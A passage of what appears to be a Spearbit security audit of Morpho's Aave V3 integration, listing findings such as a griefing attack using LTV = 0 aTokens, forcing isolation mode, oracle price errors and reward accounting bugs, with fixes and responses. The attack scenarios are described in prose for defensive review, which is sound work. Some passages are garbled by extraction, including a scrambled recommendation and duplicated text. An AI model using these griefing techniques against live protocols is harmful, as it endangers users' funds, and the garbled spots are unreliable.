Note that all those checks are done on top of the "normal" checks that would usually prevent an operation, depending on the operation itself (like, for example, an HF check). While a "normal" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility of removing the "poisoned AToken" from the Morpho wallet, part of the Morpho mechanics will break:
• Morpho's users might not be able to withdraw both collateral and "pure" supply.
• Morpho's users might not be able to borrow.
• Morpho's users might not be able to liquidate.
• Morpho's users might not be able to claim rewards via claimRewards if one of those rewards is an AToken with LTV > 0.
Recommendation: Morpho should avoid listing as markets ATokens with LTV = 0 or ATokens that will soon have LTV = 0. In case Morpho has already created markets for tokens that will be configured with LTV = 0, a well-detailed and tested procedure to reach a state that prevents the listed side effects should be applied as soon as possible. The final goal of Morpho should be to arrive at a point where those markets:
• Are paused.
• Have no supplied/borrowed balance owned by the users.
• Have only 1 wei of collateral balance owned by Morpho.
• Have the reserve set as non-collateral while remaining overall healthy.
The last two points are to avoid possible griefing attacks.

Morpho: Fixed in PR 569.

Spearbit: The fix implements a mechanism that allows Morpho to set an asset as collateral/non-collateral on Morpho and Aave. This implementation is needed to handle the edge case where an asset's LTV is set to zero by the Aave governance. Without setting an LTV = 0 asset as non-collateral on Aave, some core mechanics of Morpho's protocol would break. While this PR solves this specific issue, all the side effects described in the issue still remain true. When an asset is set to isCollateral = false on Morpho or has LTV = 0 on Aave, Morpho's users' LTV and HF will be reduced, because Morpho is no longer treating that asset as collateral. This behavior has the following consequences for Morpho's users:
• A user might not be able to borrow anymore (because of the reduced LTV).
• A user might not be able to withdraw anymore (because of the reduced HF).
• A user could become liquidable (because of the reduced HF).
• The chance increases, in case of liquidation, of the whole debtor's collateral being liquidated (because of the reduced HF).
• While the asset is no longer treated as collateral, it can still be seized during the liquidation process.
Note that in the case of LTV = 0, the same user on Aave would be in a different situation, because on Aave, in this specific scenario, only the LTV is reduced and not the HF. The PR is lacking documentation of this behavior and of the differences between Morpho and Aave in this scenario. The PR is also lacking a well-documented procedure that users should follow both before and after the LTV = 0 edge case, to avoid being liquidated or incurring any of those side effects once Morpho has set the asset as non-collateral or Aave has set the LTV to zero. Because the PR does not solve the user-side effects, Morpho should consider documenting them and providing a well-documented procedure that users should follow for the issue's scenario. Morpho should also consider implementing some UI/UX mechanism that properly alerts users to take those actions for assets that will soon be set to isCollateral = false on Morpho or LTV = 0 on Aave.

+5.1.2 Morpho is vulnerable to attackers sending LTV = 0 collateral tokens; supply/supplyCollateral, borrow and liquidate operations could stop working

Severity: Critical Risk
Context:
• Morpho-related context: PositionsManager.sol#L120-L121, PositionsManager.sol#L180, PositionsManager.sol#L213, PositionsManager.sol#L261
• Aave-related context: ValidationLogic.sol#L605-L608, SupplyLogic.sol#L146-L156, SupplyLogic.sol#L194-L204, SupplyLogic.sol#L280-L290
Description: When an AToken has LTV = 0, Aave restricts the usage of some operations. In particular, if the user owns at least one AToken as collateral that has LTV = 0, these operations could revert:
1) Withdraw: if the asset withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.
2) Transfer: if the from address is using the asset as collateral and is borrowing something, and the asset transferred is an AToken with LTV > 0, the operation will revert.
3) Setting the reserve of an AToken as non-collateral: if the AToken you are trying to set as non-collateral is an AToken with LTV > 0, the operation will revert.
Note that all those checks are done on top of the "normal" checks that would usually prevent an operation, depending on the operation itself (like, for example, an HF check). In the attack scenario, the bad actor could simply supply an underlying that is associated with an LTV = 0 AToken and transfer it to the Morpho contract. If the victim does not own any balance of the asset, it will be set as collateral, and the victim will suffer from all the side effects previously explained. While a "normal" Aave user could simply withdraw, transfer or set that asset as non-collateral, Morpho, with the current implementation, cannot do it. Because of the impossibility of removing the "poisoned AToken" from the Morpho wallet, part of the Morpho mechanics will break:
• Morpho's users might not be able to withdraw both collateral and "pure" supply.
Each of the solutions has pros, cons, and possible side effects that should be carefully evaluated. One possible solution that Morpho could explore after elaborating all the pros/cons/side effects and possible prob- lems could be to allow the DAO to set the "poison asset" as non-collateral. If the asset is part of Morpho's markets, they must be sure that Morpho's Aave position remains healthy. If the asset is not part of Morpho's markets, there should be no problem regarding the health factor. A second possible solution could be to allow the DAO to withdraw/transfer the "poisoned token" if the token does not belong to an existing market (this is to prevent touching the user's assets). If the token belongs to Morpho's market, the solution is trickier and should probably fall back to the first solution without touching the user's balance in an active way. Because of how Aave behaves, it should be noted that if Morpho withdraws/transfer all the balance of the LTV = 0 asset, the attacker can repeat the griefing attack by transferring again the "poisoned asset" to Morpho that would be re-enabled as collateral by default. Because of this, probably the second solution should be avoided. It should be noted that the problems described above could exist for assets that already belong to the existing Morpho market. This scenario will be handled in a separate issue. Morpho: Fixed by P5 569 followed by P5 768. In case of emergency we'll follow the guidelines written in this notion link. At deployment we sent aTokens of all markets to the Morpho contract and disabled them as collateral on pool so that this attack cannot be performed on the current listed assets on Aave. Also, Aave is planning an upgrade that would fix this issue. Spearbit: Fixed. +5.1.3 Morpho is not correctly handling the asset price in _getAssetPrice when isInEMode == true but priceSource is addres(0) Severity: Critical Risk Context: MorphoInternal.sol#L524-L536 Description: The current implementation of _getAssetPrice returns the asset's price based on the value of isInEMode function _getAssetPrice(address underlying, IAaveOracle oracle, bool isInEMode, address priceSource) internal view returns (uint256) if (isInEMode) { uint256 eModePrice = oracle.getAssetPrice(priceSource); if (eModePrice != 0) return eModePrice; } return oracle.getAssetPrice(underlying); { } As you can see from the code, if isInEMode is equal to true they call oracle.getAssetPrice no matter what the value of priceSource that could be address(0). 7 If we look inside the AaveOracle implementation, we could assume that in the case where asset is address(0) (in this case, Morpho pass priceSource _getAssetPrice parameter) it would probably return _fallbackOra- cle.getAssetPrice(asset). In any case, the Morpho logic diverges compared to what Aave implements. On Aave, if the user is not in e-mode, the e-mode oracle is address(0) or the asset's e-mode is not equal to the user's e-mode (in case the user is in e-mode), Aave always uses the asset price of the underlying and not the one in the e-mode priceSource. The impact is that if no explicit eMode oracle has been set, Morpho might revert in price computations, breaking liquidations, collateral withdrawals, and borrows if the fallback oracle does not support the asset, or it will return the fallback oracle's price which is different from the price that Aave would use. 
Recommendation: Morpho should use and return the e-mode price eModePrice only when isInEMode and price- Source != address(0) Morpho: Recommendation implemented in PR 590. Spearbit: Fixed. +5.1.4 Isolated assets are treated as collateral in Morpho Severity: Critical Risk Context: aave-v3/SupplyLogic.sol#L78, aave-v3/ValidationLogic.sol#L711, aave-v3/UserConfiguration.sol#L194, PositionsManagerInternal.sol#L408 Description: Aave-v3 introduced isolation assets and isolation mode for users: "Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation the mode can be borrowed by users utilizing isolated collateral up to a specified debt ceiling." The Morpho contract is intended not to be in isolation mode to avoid its restrictions. Supplying an isolated asset to Aave while there are already other (non-isolated) assets set as collateral will simply supply the asset to earn yield without setting it as collateral. However, Morpho will still set these isolated assets as collateral for the supplying user. Morpho users can borrow any asset against them which should not be possible: • Isolated assets are by definition riskier when used as collateral and should only allow borrowing up to a specific debt ceiling. • The borrows are not backed on Aave as the isolated asset is not treated as collateral there, lowering the Morpho Aave position's health factor and putting the system at risk of liquidation on Aave. Recommendation: The current code assumes that a supplied asset is always set as collateral on Aave whenever a supplyCollateral action with its _POOL.supplyToPool call succeeds. In addition to Morpho can end up in isolation mode which ensures that the system does not end up in isolation mode, reject isolated assets for supplyCollateral calls. Alternatively, check that the supplied asset is indeed set as collateral on Aave after the _POOL.supplyToPool(underlying, amount) call. Morpho: Addressed with PR 569. More information on edge cases and how we would handle can be found here. Spearbit: Fixed. 8 5.2 High Risk +5.2.1 Morpho's logic to handle LTV = 0 AToken diverges from the Aave logic and could decrease the user's HF/borrowing power compared to what the same user would have on Aave Severity: High Risk MorphoInternal.sol#L324, Context: PositionsManagerInternal.sol#L176-L192 PositionsManager.sol#L118, PositionsManager.sol#L209-L211, Description: The current implementation of Morpho has a specific logic to handle the scenario where Aave sets the asset's LTV to zero. We can see how Morpho is handling it in the _assetLiquidityData function function _assetLiquidityData(address underlying, Types.LiquidityVars memory vars) internal view returns (uint256 underlyingPrice, uint256 ltv, uint256 liquidationThreshold, uint256 tokenUnit) { ,! } // other function code... // If the LTV is 0 on Aave V3, the asset cannot be used as collateral to borrow upon a breaking withdraw. // In response, Morpho disables the asset as collateral and sets its liquidation threshold // to 0 and the governance should warn users to repay their debt. if (config.getLtv() == 0) return (underlyingPrice, 0, 0, tokenUnit); // other function code... The _assetLiquidityData function is used to calculate the number of assets a user can borrow and the maximum debt a user can reach before being liquidated. Those values are then used to calculate the user Health Factor. 
The Health Factor is used to • Calculate both if a user can be liquidated and in which percentage the collateral can be seized. • Calculate if a user can withdraw part of his/her collateral. The debt and borrowable amount are used in the Borrowing operations to know if a user is allowed to borrow the specified amount of tokens. On Aave, this situation is handled differently. First, there's a specific distinction when the liquidation threshold is equal to zero and when the Loan to Value of the asset is equal to zero. Note that Aave enforces (on the configuration setter of a reserve) that ltv must be <= of liquidationThreshold, this implies that if the LT is zero, the LTV must be zero. In the first case (liquidation threshold equal to zero) the collateral is not counted as collateral. This is the same behavior followed by Morpho, but the difference is that Morpho also follows it when the Liquidation Threshold is greater than zero. In the second case (LT > 0, LTV = 0) Aave still counts the collateral as part of the user's total collateral but does not increase the user's borrowing power (it does not increase the average LTV of the user). This influences the user's health factor (and so all the operations based on it) but not as impactfully as Morpho is doing. In conclusion, when the LTV of an asset is equal to zero, Morpho is not applying the same logic as Aave is doing, removing the collateral from the user's collateral and increasing the possibility (based on the user's health factor, user's debt, user's total collateral and all the asset's configurations on Aave) to • Deny a user's collateral withdrawal (while an Aave user could have done it). • Deny a user's borrow (while an Aave user could have done it). • Make a user liquidable (while an Aave user could have been healthy). • Increasing the possibility to allow the liquidator to seize the full collateral of the borrower (instead of 50%). 9 Recommendation: While the motivation of the Morpho approach is understandable, related to the side effects of an LTV = 0 asset in the Morpho context (see "Side effects of LTV = 0 assets: Morpho's users will not be able to withdraw (collateral and "pure" supply), borrow and liquidate" and "Morpho is vulnerable to attackers sending LTV = 0 collateral tokens, supply/supplyCollateral, borrow and liquidate operations could stop working", Morpho should evaluate all the possible alternative solutions to avoid creating a worse user experience in this edge case scenario. If there are no other possible options, Morpho should at least • Add in-depth documentation in the code about this decision and all the side effects that it could have on the user positions • Detail this behavior on their online documentation and warn the user Morpho: Addressed in PR 569. Spearbit: The PR implements a mechanism that allows the Morpho DAO to set an asset as collateral/not collateral on Morpho and Aave. This implementation is needed to handle the edge case where an asset LTV is set to zero by the Aave Governance. Without setting an LTV = 0 asset as non-collateral on Aave, some core mechanics of Morpho's protocol would break. While this PR solves this specific issue, all the side effects described in the issue still remain true. When an asset is set to isCollateral = false on Morpho or has LTV = 0 on Aave, Morpho's user's LTV and HF will be reduced because Morpho is treating that asset not as collateral anymore. 
The behavior has the following consequences for Morpho's users: • User could not be able to borrow anymore (because of reduced LTV). • User could not be able to withdraw anymore (because of reduced HF). • User could be liquidable (because of reduced HF). • Increase the possibility, in case of liquidation, to liquidate the whole debtor's collateral (because of reduced HF). • While the asset is not threaded as collateral anymore, it can still be sized during the liquidation process. Note that in case LTV = 0, the same user on Aave would have a different situation because on Aave, in this specific scenario, only the LTV is reduced and not the HF. The PR is lacking documentation of this behavior and the differences between Morpho and Aave in this scenario. The PR is also lacking a well documented procedure that the users should follow both before and after the LTV = 0 edge case to avoid being liquidated or incur in any of those side effects once Morpho's has set the asset as not-collateral or Aave has set the LTV to zero. Because the PR does not solve the user's side effects, Morpho should consider documenting them and provide a well-documented procedure that the users should follow for the issue's scenario. Morpho should also consider implementing some UI/UX mechanism that properly alerts users to take those actions for assets that will soon be set to isCollateral = false on Morpho or LTV = 0 on Aaave. Marked as Acknowledged. 10 +5.2.2 RewardsManager does not take in account users that have supplied collateral directly to the pool Severity: High Risk Context: RewardsManager.sol#L436 Description: Inside RewardsManager._getUserAssetBalances Morpho is calculating the amount of the supplied and borrowed balance for a specific user. In the current implementation, Morpho is ignoring the amount that the user has supplied as collateral directly into the Aave pool. As a consequence, the user will be eligible for fewer rewards or even zero in the case where he/she has supplied only collateral. Recommendation: should PHO.scaledCollateralBalance(market.underlying, user) equal When _MORPHO.scaledPoolSupplyBalance(market.underlying, user) userAssetBalances[i].balance _MOR- asset == market.aToken, be to + Morpho: Recommendation implemented in PR 587. Spearbit: Fixed. +5.2.3 Accounting issue when repaying P2P fees while having a borrow delta Severity: High Risk Context: PositionsManagerInternal.sol#L308, DeltasLib.sol#L88, MarketSideDeltaLib.sol#L63 Description: When repaying debt on Morpho, any potential borrow delta is matched first. Repaying the delta should involve both decreasing the scaledDelta as well as decreasing the scaledP2PAmount by the matched amount. [ˆ1] However, the scaledP2PAmount update is delayed until the end of the repay function. The following repayFee call then reads the un-updated market.deltas.borrow.scaledP2PAmount storage variable leading to a larger estimation of the P2P fees that can be repaid. The excess fee that is repaid will stay in the contract and not be accounted for, when it should have been used to promote borrowers, increase idle supply or demote suppliers. For example, there could now be P2P suppliers that should have been demoted but are not and in reality don't have any P2P counterparty, leaving the entire accounting system in a broken state. • Example (all values are in underlying amounts for brevity.) Imagine a borrow delta of 1000, borrow.scaledP2PTotal = 10,000 supply.scaledP2PTotal = 8,000, so the repayable fee should be (10,000 - 1000) - (8,000 - 0) = 1,000. 
Now a P2P borrower wants to repay 3000 debt: 1. Pool repay: no pool repay as they have no pool borrow balance. 2. Decrease p2p borrow delta: decreaseDelta is called which sets market.deltas.borrow.scaledDelta = 0 (but does not update market.deltas.borrow.scaledP2PAmount yet!) and returns matchedBorrowDelta = 1000. 3. repayFee is called and it computes (10,000 - 0) - (8,000 - 1,000) = 2,000. They repay more than the actual fee. Recommendation: One way to resolve this issue is by having MarketSideDeltaLib.decreaseDelta decrease the deltas.borrow.scaledP2PTotal by the scaled repaid amount. The market.deltas.decreaseP2P call then only needs to reduce the P2P delta by vars.toSupply + idleSupplyIncrease. Consider adding tests for a scenario that has both a positive borrow delta and fees to repay. Morpho: Fixed in PR 565. Spearbit: Fixed, the scaledP2PTotal is now decreased before calling repayFee. +5.2.4 Repaying with ETH does not refund excess Severity: High Risk Context: WETHGateway.sol#L67 Description: Users can repay WETH Morpho positions with ETH using the WETHGateway. The specified repay amount will be wrapped to WETH before calling the Morpho function to repay the WETH debt. However, the Morpho repay function only pulls in Math.min(_getUserBorrowBalanceFromIndexes(underlying, onBehalf, indexes), amount). If the user specified an amount larger than their debt balance, the excess will be stuck in the WETHGateway contract. This might be especially confusing for users because the standard Morpho.repay function does not have this issue and they might be used to specifying a large, round value to be sure to repay all principal and accrued debt once the transaction is mined. Recommendation: Compute the difference between the specified amount and the amount that was actually repaid, and refund it to the user. uint256 excess = msg.value - _MORPHO.repay(_WETH, msg.value, onBehalf); _unwrapAndTransferETH(excess, msg.sender); Furthermore, consider adding skim functions that can send any stuck ERC20 or native balances to a recovery account, for example, the Morpho treasury (if defined). Morpho: Fixed in PR 588 and PR 605. Spearbit: Fixed. +5.2.5 Morpho can end up in isolation mode Severity: High Risk Context: aave-v3/SupplyLogic.sol#L78, aave-v3/ValidationLogic.sol#L711, aave-v3/UserConfiguration.sol#L194 Description: Aave-v3 introduced isolation assets and isolation mode for users: "Borrowers supplying an isolated asset as collateral cannot supply other assets as collateral (though they can still supply to capture yield). Only stablecoins that have been permitted by Aave governance to be borrowable in isolation mode can be borrowed by users utilizing isolated collateral, up to a specified debt ceiling." The Morpho contract has a single Aave position for all its users and therefore does not want to end up in isolation mode due to its restrictions. The Morpho code would still treat the supplied non-isolation assets as collateral for their Morpho users, allowing them to borrow against them, but the Aave position does not treat them as collateral anymore. Furthermore, Morpho can only borrow stablecoins up to a certain debt ceiling. Morpho can be brought into isolation mode: • Up to deployment: an attacker maliciously sends an isolated asset to the address of the proxy. Aave sets assets as collateral when transferred, such that the Morpho contract already starts out in isolation mode. This can even happen before deployment by precomputing addresses or simply frontrunning the deployment.
This attack also works if Morpho does not intend to create a market for the isolated asset. • Upon deployment and market creation: an attacker or unknowing user is the first to supply an asset and this asset is an isolated asset; Morpho's Aave position automatically enters isolation mode. • At any time if an isolated asset is the only collateral asset. This can happen when collateral assets are turned off on Aave, for example, by withdrawing (or liquidating) the entire balance. Recommendation: Never end up in isolation mode. Upon deployment, consider setting a non-isolation asset as collateral by using pool.supply on behalf of the contract, or simply by sending an aToken of a non-isolated asset to the contract address. Also, consider adding a function calling setReserveAsCollateral to be able to turn off collateral for isolated assets at any time. Note: this function reverts if there is no balance. Morpho: Acknowledged. Spearbit: Acknowledged. 5.3 Medium Risk +5.3.1 Collateral setters for Morpho / Aave can end up in a deadlock Severity: Medium Risk Context: MorphoSetters.sol#L87-L107 Description: One can end up in a deadlock where changing the Aave pool or Morpho collateral state is not possible anymore, because it can happen that Aave automatically turns the collateral asset off (for example, when withdrawing everything / getting liquidated). Imagine a collateral asset is turned on for both protocols: setAssetIsCollateralOnPool(true) setAssetIsCollateral(true) Then, a user withdraws everything on Morpho / Aave, and Aave automatically turns it off. It's off on Aave but still on on Morpho. It can't be turned on for Aave anymore because: if (market.isCollateral) revert Errors.AssetIsCollateralOnMorpho(); But it also can't be turned off on Morpho anymore because of: if (!_pool.getUserConfiguration(address(this)).isUsingAsCollateral(_pool.getReserveData(underlying).id)) { revert Errors.AssetNotCollateralOnPool(); } This will be bad if new users deposit after the entire asset has been withdrawn. The asset is collateral on Morpho but not on Aave, breaking an important invariant that could lead to the Morpho Aave position being liquidated. Recommendation: Keep some buffer so not everything can be withdrawn; however, this doesn't completely fix the issue because liquidations allow seizing more assets than have been deposited. Consider always being able to turn an asset off on Morpho, regardless of the pool state. The check that it is also on on the pool should only be required when turning an asset on as collateral on Morpho. Morpho: • First, we plan to send aTokens for all assets to Morpho to prevent the LTV = 0 griefing attack, so the only way this is possible is for Morpho to be liquidated. • This scenario is very unlikely to happen, and if Morpho gets liquidated the state is desynced anyway. • At the first deposit of a user or unmatching process, underlying will be deposited on the pool, resetting the asset as collateral by default even after the potential changes added by this PR on Aave. Spearbit: Acknowledged. +5.3.2 First reward claim is zero for newly listed reward tokens Severity: Medium Risk Context: RewardsManager.sol#L291, RewardsManager.sol#L434, aave-v3/RewardsDistributor.sol#L261 Description: When Aave adds a new reward token for an asset, the reward index for this (asset, reward) pair starts at 0. When an update in Morpho's reward manager occurs, it initializes all rewards for the asset and would initialize this new reward token with a startingIndex of 0. 1.
Time passes and emissions accumulate to all pool users, resulting in a new index assetIndex. Users who deposited on the pool through Morpho before this reward token was listed should receive their fair share of the entire emission rewards (assetIndex - 0) * oldBalance, but they currently receive zero because getRewards returns early if the user's computed index is 0. 2. Also note that the external getUserAssetIndex(address user, address asset, address reward) can be inaccurate because it doesn't simulate setting the startingIndex for reward tokens that haven't been set yet. 3. A smaller issue that can happen when new reward tokens are added is that updates to the startingIndex are late: the startingIndex isn't initialized to 0 but to some asset index that has already accrued emissions for some time. Morpho on-pool users would lose some rewards until the first update to the asset. (They should accrue from index 0 but accrue from startingIndex.) Given frequent calls to the RewardsManager that initialize all rewards for an asset, this difference should be negligible. Recommendation: The special case for a computed user index (_computeUserIndex) of 0 in getRewards seems unnecessary because initializing startingIndex is always done before calling _computeUserIndex (except for the external getUserAssetIndex function). With the way userIndex is chosen in _computeUserIndex, a userIndex of 0 means localRewardData.startingIndex is 0, i.e., the (asset, reward) pair was correctly initialized to 0 in the contract. function _getRewards(uint256 userBalance, uint256 reserveIndex, uint256 userIndex, uint256 assetUnit) internal pure returns (uint256 rewards) { - // If `userIndex` is 0, it means that it has not accrued reward yet. - if (userIndex == 0) return 0; rewards = userBalance * (reserveIndex - userIndex); assembly { rewards := div(rewards, assetUnit) } } Morpho: The suggested fix was implemented in PR 791. However, it was also suggested to update the getUserAssetIndex getter, which does not take into account a potential starting index != 0. I disagree with this, because exposing a virtual starting index update is inaccurate too: it's not guaranteed that the starting index of a reward asset already listed but not tracked by Morpho would be updated in the same block as the query. A first version of such a change was drafted in PR 795, but I don't think it's more accurate, so I'd rather be in favor of keeping the current version of the RewardsManager, acknowledging that the user index exposed through the getter may just not reflect a potential starting index update happening in the same block. Spearbit: Marked as fixed by PR 791. It would be more accurate (it would even be perfectly accurate from a third-party smart contract's POV calling it), but we agree that this is an edge case that shouldn't happen often, and it's unclear what this view function is even used for and whether it needs to be fully accurate. The gain might not be worth the more complex code flow that is required for the fix. Documenting this limitation for third parties might be enough. +5.3.3 Disable creating markets for siloed assets Severity: Medium Risk Context: aave-v3/UserConfiguration.sol#L214 Description: Aave-v3 introduced siloed-borrow assets and siloed-borrow mode for users: "This feature allow assets with potentially manipulatable oracles (for example illiquid Uni V3 pairs) to be listed on Aave as single borrow asset i.e. if user borrows siloed asset, they cannot borrow any other asset.
This helps mitigating the risk associated with such assets from impacting the overall solvency of the protocol." - Aave Docs The Morpho contract should not be in siloed-borrowing mode to avoid its restrictions on borrowing any other listed assets, especially as borrowing on the pool might be required for withdrawals. If a market for the siloed asset is created at deployment, users might borrow the siloed asset and break borrowing of any of the other assets. Recommendation: There are two possible ways of handling siloed assets: • Disabling market creations: disallow creating markets for siloed assets as they shouldn't be borrowed on Morpho. Using them as collateral is also useless as they will likely have an LT/LTV of 0 on Aave. "A user can supply Siloed Asset just like any other asset using supply() method in pool.sol, though, the asset will not be enabled to use as collateral i.e. supplied amount will not add to the total collateral balance of the user." - Aave Docs The Aave docs are misleading, as supplying the siloed assets does indeed enable them as collateral and there are no further restrictions on a siloed asset's LT/LTV. However, as this asset class is intended for assets with "potentially manipulatable oracles", using them as collateral should be disabled on Morpho. • Deploying a custom Morpho pool: alternatively, if there is high demand for users to borrow this asset, Morpho can deploy a new set of contracts, similar to what is being done for the efficiency mode. The only suppliable and borrowable asset should be the siloed asset; all other markets should only allow supplying and withdrawing as collateral. Morpho: Fixed in PR 633. Spearbit: Fixed. The _createMarket function now reverts when listing siloed assets. Setting an asset as siloed borrowing while it is already listed is unlikely to occur, and even if it occurs there are likely already other borrow positions on Morpho and borrowing the siloed asset would fail. +5.3.4 A high value of _defaultIterations could make the withdrawal and repay operations revert because of OOG Severity: Medium Risk Context: PositionsManager.sol#L146-L147, PositionsManager.sol#L176-L178, MatchingEngine.sol#L128-L158 Description: When the user executes some actions, he/she can specify their own maxIterations parameter. The user maxIterations parameter is directly used in supplyLogic and borrowLogic. In withdrawLogic Morpho is recalculating the maxIterations to be used internally as Math.max(_defaultIterations.withdraw, maxIterations), and in repayLogic it is directly using _defaultIterations.repay as the max number of iterations. This parameter is used as the maximum number of iterations that the matching engine can do to match suppliers/borrowers during promotion/demotion operations. function _promoteOrDemote( LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, Types.MatchingEngineVars memory vars ) internal returns (uint256 processed, uint256 iterationsDone) { if (vars.maxIterations == 0) return (0, 0); uint256 remaining = vars.amount; // matching engine code... for (; iterationsDone < vars.maxIterations && remaining != 0; ++iterationsDone) { // matching engine code (onPool, inP2P, remaining) = vars.step(...); // matching engine code... } // matching engine code... } As you can see, the iteration keeps going until the matching engine has matched enough balance or the iterations have reached the maximum number of iterations.
If the matching engine cannot match enough balance, it could revert because of OOG if vars.maxIterations is a high value. For the supply or borrow operations, the user is responsible for the specified number of iterations that might be done during the matching process; in that case, if the operation reverts because of OOG, it's not an issue per se. The problem arises for the withdraw and repay operations, where Morpho is forcing the number of iterations and could make all those transactions always revert in case the matching engine does not match enough balance in time. Keep in mind that even if the transaction does not revert during the _promoteOrDemote logic, it could still revert during the following operations simply because _promoteOrDemote has consumed so much gas that too little remains for them. Recommendation: Consider stress testing the correct values to be used for _defaultIterations.repay and _defaultIterations.withdraw to prevent those operations from reverting because of OOG. Morpho: We're conducting studies on the matching efficiency given a max iterations value as well as the gas consumed. This study should give us the appropriate max iterations that we should set. Spearbit: Acknowledged. +5.3.5 Morpho should check that the _positionsManager used has the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values used by the Morpho contract itself Severity: Medium Risk Context: Morpho.sol#L48, MorphoSetters.sol#L59 Description: Because _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER are immutable variables and because Morpho is calling the PositionsManager in a delegatecall context, it's fundamental that both Morpho and PositionsManager have been initialized with the same _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER values. Morpho should also check the values of PositionsManager._E_MODE_CATEGORY_ID and PositionsManager._ADDRESSES_PROVIDER in both the setPositionsManager and initialize functions. Recommendation: Implement, in both the setPositionsManager and initialize functions, a check that reverts if the values of _E_MODE_CATEGORY_ID and _ADDRESSES_PROVIDER in Morpho and PositionsManager are not equal. Note that Morpho has to create a public getter for those immutable values because they are declared as internal. Morpho: We decided to put the variables in storage. We know it's not ideal in terms of gas, but we prefer to do so for safety considerations. Spearbit: The Morpho team has decided to implement the recommendation by changing the _ADDRESSES_PROVIDER, _POOL, and _E_MODE_CATEGORY_ID variables from immutable to storage. By doing that, the Morpho contract will not rely on the immutable values stored in the PositionsManager when called via delegatecall but will instead use the storage values of the Morpho contract itself. The implementation has been done in PR 597. Two additional considerations to be noted after the PR changes: • Morpho has removed the event Events.EModeSet that was emitted during the Morpho.initialize function. They are now relying on the Aave-side event emission. They should remember to update their current monitoring system to switch to the new behavior. • The RewardsManager constructor does not include the _pool in the list of inputs and relies on the value that comes from IMorpho(morpho).pool(). With the new behavior of the PR, the Morpho contract could be deployed but not yet initialized; in that case, IMorpho(morpho).pool() would return address(0). Morpho should consider adding this additional check inside the constructor.
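For reference, a minimal sketch of the originally recommended equality check in setPositionsManager follows. The public getters eModeCategoryId() and addressesProvider() and the two custom errors are hypothetical names introduced for illustration (the immutables are internal, hence the getters), and the actual fix in PR 597 took the alternative route of moving the variables to storage:

function setPositionsManager(address newPositionsManager) external onlyOwner {
    // Reject a positions manager built against a different Aave configuration:
    // under delegatecall its immutables (baked into its code) would silently win.
    if (IPositionsManager(newPositionsManager).eModeCategoryId() != _E_MODE_CATEGORY_ID) {
        revert Errors.InconsistentEModeCategoryId(); // hypothetical error name
    }
    if (IPositionsManager(newPositionsManager).addressesProvider() != _ADDRESSES_PROVIDER) {
        revert Errors.InconsistentAddressesProvider(); // hypothetical error name
    }
    _positionsManager = newPositionsManager;
}

The same two checks would be performed in initialize.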
+5.3.6 In _authorizeLiquidate, when healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD Morpho is wrongly setting the close factor to DEFAULT_CLOSE_FACTOR Severity: Medium Risk Context: PositionsManagerInternal.sol#L181-L190 Description: When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD, Morpho is returning the wrong value for the closeFactor, allowing only 50% of the collateral to be liquidated instead of the whole amount. When the healthFactor is lower than or equal to Constants.MIN_LIQUIDATION_THRESHOLD, Morpho should return Constants.MAX_CLOSE_FACTOR, following the same logic applied by Aave. Note that the user cannot be liquidated, even if healthFactor == MIN_LIQUIDATION_THRESHOLD, if the priceOracleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall. Recommendation: Consider decoupling the logic that checks if a user can be liquidated from the logic that calculates the correct close factor to be used for the liquidation. After doing that, apply the correct fixes to follow the same behavior as Aave to determine the close factor. Morpho: Recommendation implemented in PR 571. Spearbit: Fixed. +5.3.7 _authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation Severity: Medium Risk Context: PositionsManagerInternal.sol#L106-L126 Description: Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has not been allowed by the priceOracleSentinel: require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user needed to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool. Recommendation: Implement the priceOracleSentinel check, reverting in case IPriceOracleSentinel(priceOracleSentinel).isBorrowAllowed() == false. Morpho: The recommendation has been implemented in PR 599. Spearbit: Fixed. 5.4 Low Risk +5.4.1 _updateInDS does not "bubble up" the updated values of onPool and inP2P Severity: Low Risk Context: MorphoInternal.sol#L352-L353, MorphoInternal.sol#L410 Description: The _updateInDS function takes as input uint256 onPool and uint256 inP2P, which are passed not by reference, but as pure values. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower than or equal to Constants.DUST_THRESHOLD, will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller, which will later use those values that could have been changed by the _updateInDS logic.
